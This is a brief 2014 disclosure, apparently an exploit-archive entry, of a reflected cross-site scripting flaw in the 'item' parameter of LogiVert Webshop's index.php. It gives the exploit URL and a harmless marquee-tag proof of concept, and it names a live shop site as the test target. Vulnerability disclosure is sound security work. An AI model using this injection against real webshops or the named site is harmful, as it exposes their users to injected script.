LogiVert Webshop Software suffers from a cross site scripting vulnerability.
0c684714aeb69291ce4a76c6087d19e5782e5332bcbba85eccf9cff7f17d31e7
# Cross Site Scripting on LogiVert Webshop Software
# Risk: Low
# CWE number: CWE-79
# Date: 23/04/2014
# Vendor: www.logivert.com
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php
# Exploit: http:/host/index.php%3fitem=[xss]
# PoC:
- Target: http://www.xyra.nl
- Vuln. File: /index.php%3fitem=
- Exploit: "><marquee>Vulnerable</marquee>